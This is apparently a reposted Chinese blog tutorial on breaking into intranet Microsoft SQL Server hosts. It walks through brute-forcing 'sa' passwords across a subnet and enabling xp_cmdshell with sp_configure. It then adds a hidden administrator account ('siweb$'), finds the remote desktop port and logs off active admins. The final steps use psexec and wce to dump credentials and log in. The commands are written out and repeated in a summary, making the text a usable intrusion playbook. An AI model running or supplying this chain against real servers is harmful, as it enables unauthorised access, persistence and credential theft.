专栏首页企鹅号快讯内网及外网MSSQL口令扫描渗透

内网及外网MSSQL口令扫描渗透

在实际渗透过程中,往往通过SQL注入或者弱口令登录后台,成功获取了Webshell,但对于如何进行内网渗透相当纠结,其实在获取入口权限的情况下,通过lcx端口转发等工具,进入内网,可以通过数据库、系统账号等口令扫描来实施内网渗透。本文就介绍如何在内网中进行MSSQL口令扫描及获取服务器权限。

1.使用SQLPing扫描获取mssql口令

在SQLPing程序目录,配置好passlist.txt和userlist.txt文件,如图1所示,设置扫描的IP地址及其范围,本案例是针对内网开始地址192.100.100.1,终止地址为192.100.100.254。在实际渗透测试中根据实际需要来设置扫描的IP地址,User list也是根据实际掌握情况来设置,比较常用的用户为sa。Passwordlist根据实际收集的密码来进行扫描,如果是普通密码破解,则可以使用top10000password这种字典,在内网中可以逐渐加强该字典,将收集到的所有用户密码全部加入。

图1设置SQLPing

2.扫描并破解密码如图2所示,对192.100.100.X的C段地址进行扫描,成功发现16个MSSQL实例,且暴力破解成功5个账号,红色字体表示破解成功。单击“File”菜单,可以将扫描结果保存为xml文件,然后打开文件进行查看,如图3所示。

图2对MSSQL口令进行暴力破解

图3查看扫描结果

3.使用SQLTOOLS进行提权

(1)连接测试

在SQL连接设置中分别填入IP地址“192.100.100.33”,密码“lo*******”,如图4所示,单击连接,如果密码正确则会提示连接成功,然后执行”dir c:\”命令来测试是否可以执行DOS命令。

图4执行命令失败

(2)查看数据库版本

在SQL命令中执行“select @@version”命令,如图5所示,获取当前数据库为SQLServer2005.

图5获取数据库版本号

(3)恢复xp_cmdshell存储过程

在SQLTools中分别执行以下语句来恢复xp_cmdshell存储过程,执行效果如图6所示。

EXEC sp_configure 'show advanced options', 1;

RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

图6恢复存储过程

(4)获取当前权限

在DOS命令中执行“whoami”命令获取当前用户权限为系统权限(nt authority\system),如图7所示。

图7获取当前用户权限为系统权限

(5)添加管理员用户到管理组

在DOS命令中分别执行以下语句

net user siweb$ siweb /add

net localgroup administrators siweb$ /add

net localgroup administrators

来添加用户siweb$密码为siweb,并将siweb$用户添加到管理员组,最后查看管理员组用户siweb$是否添加成功,如图8,图9,图10所示。

图8添加用户

图9添加到管理员组

图10查看管理员组用户是否添加成功

(6)获取远程终端端口

远程终端默认端口是3389,有些情况下,无法直接端口进行扫描,则可以通过命令行来快速获取:

tasklist /svc | find " Term " 或者tasklist /svc | find " TermService "

显示结果如图11所示,其中7100表示进程号,TermService表示远程终端服务。

netstat -ano | find "7100"则表示获取进程号为7100的端口号,如图12所示。

图11获取TermService服务所在的进程号

图12获取远程终端端口号

(7)查看当前远程终端用户登录情况

如图13所示,可以使用queryuser/quser等命令来查看当前3389连接情况,防止发生管理员在线情况下登入服务器!使用logoff ID注销当前登录的用户。例如注销管理员显示为唱片的用户,则可以使用“logoff1”命令。

图13查看当前用户使用远程终端的情况

3.使用p**ec配合wce来获取密码

执行net use \\192.100.100.33\admin$ “siweb” /user:siweb$

P**ec\\192.100.100.33 cmd

如图14所示,成功进行交互式命令提示符。

图14使用p**ec连接服务器执行命令

(2)获取当前系统架构

执行systeminfo | find "86"获取信息中会显示Family等字样,如图15所示,则表明该操作系统是X86系统,否则使用systeminfo | find "64"命令来获取该架构为X64架构,然后使用对应的wce等密码获取程序来获取明文或者加密的哈希值。

图15获取系统架构

4.登录远程终端

使用获取的密码Administrator/!XML********登录192.100.100.33服务器,如图16所示成功获取内网中一台服务器权限。

图16成功登录远程终端

4.总结与提高

(1)口令扫描,可以通过sqlping等工具对内网IP进行扫描,获取sa口令

(2)查看服务器版本,对SQLServer2005可恢复其存储进程:EXEC sp_configure 'show advanced options', 1;RECONFIGURE;EXEC sp_configure 'xp_cmdshell', 1;RECONFIGURE;

(3)对SQLServer2000/2005可以查看其当前用户权限,执行whomai,如果是管理员权限,则可以通过添加用户来获取服务器权限。

net user siweb$ siweb /add

net localgroup administrators siweb$ /add

net localgroup administrators

(4)精确获取远程终端端口命令:tasklist /svc | find "Term"

svchost.exe 7100 TermService

netstat -ano | find "7100"

(5)获取操作系统架构,便于使用合适的密码获取软件获取明文密码

systeminfo | find "86"

systeminfo

本文来自企鹅号 - 疯猫网络媒体

我来说两句

0 条评论
登录 后参与评论

相关文章

  • C语言怎么学习?以C语言模拟登录为例,学C语言该当如此方可成

    好了不用看了,看直了也不会有妹子,看题了: C语言编写代码实现,模拟用户登录------看着是不是很简单?,是不是很轻松?,是不是就有这样的代码? (小编随便百...

    企鹅号小编
  • 如何把业务问题变成机器学习的问题?

    机器学习的投入 这就是我们MVP的第二步:在可控的人力、金钱投入下,构建一个有效的机器学习模型。 那什么是可控呢?1-3人月的投入,更多就会风险太高。我们会期望...

    企鹅号小编
  • 区块链技术(一):Truffle开发入门

    区块链专栏作家 瀚德FinTech创新学院 特邀讲师:汪晓明 ? 芯链项目创始人,朝夕网络CEO。10年互联网技术开发经验。曾参与创立银联大数据、Beltal,...

    企鹅号小编
  • 麦达SaaS指数:SaaS CRM的NPS均值为20% 仍需在产品服务上补强

    T客汇官网:tikehui 撰文 | 齐斌 NPS值直观的明确的反映出客户对企业的口碑和推荐度,具有雷达作用。如果NPS值越高,预示着厂商的产品销售机会,在未来...

    人称T客
  • 17.11.11日报

    2,继续看加载慢的问题,大概可以用postTask加个优先级搞定。原版blink的调度器其实是有优先级概念的,这样加载任务会比绘制任务更快得到执行

    龙泉寺扫地僧
  • 窃听风云:扒掉你的最后一条“胖次”

    “每个人的手机都是一部窃听器,不管你开不开机,都能被窃听。”在2009年上映的《窃听风云》中吴彦祖饰演的人物有这样一句台词,随着影片热映,“手机窃听”的问题被更...

    FB客服
  • 父母总信健康谣言?腾讯官方出了款小程序,用真科学粉碎它们 | 亲儿子 #31

    生活中如果生病了,总是希望清清楚楚地知道自己得了什么病,以及怎样才能最有效治地好它。

    知晓君
  • 冲击亚马逊,Google 计划让自动驾驶卡车送快递?

    据 Quartz 报道,Google 目前已经获得了一项运送快递的自动驾驶卡车技术专利。届时,获得专利的卡车上将装满安全小隔间,用户只需要通过安全码和信用卡就可...

    新智元
  • 2018年度腾讯犀牛鸟精英人才培养计划优秀学生成果分享(二)

    随着互联网的发展逐渐进入 “深水区”,基础研究与应用研究融通创新发展已引发业界广泛关注,协调产学各方资源,加速培养更多创新型研究人才变得尤为重要。腾讯自201...

    腾讯高校合作
  • STM32中断设置以及中断优先级设置三步曲

           中断作为stm32中必不可少的一个功能,其重要性是不言而喻的因此把中断学习好是根本。

    用户6754675

扫码关注云+社区

领取腾讯云代金券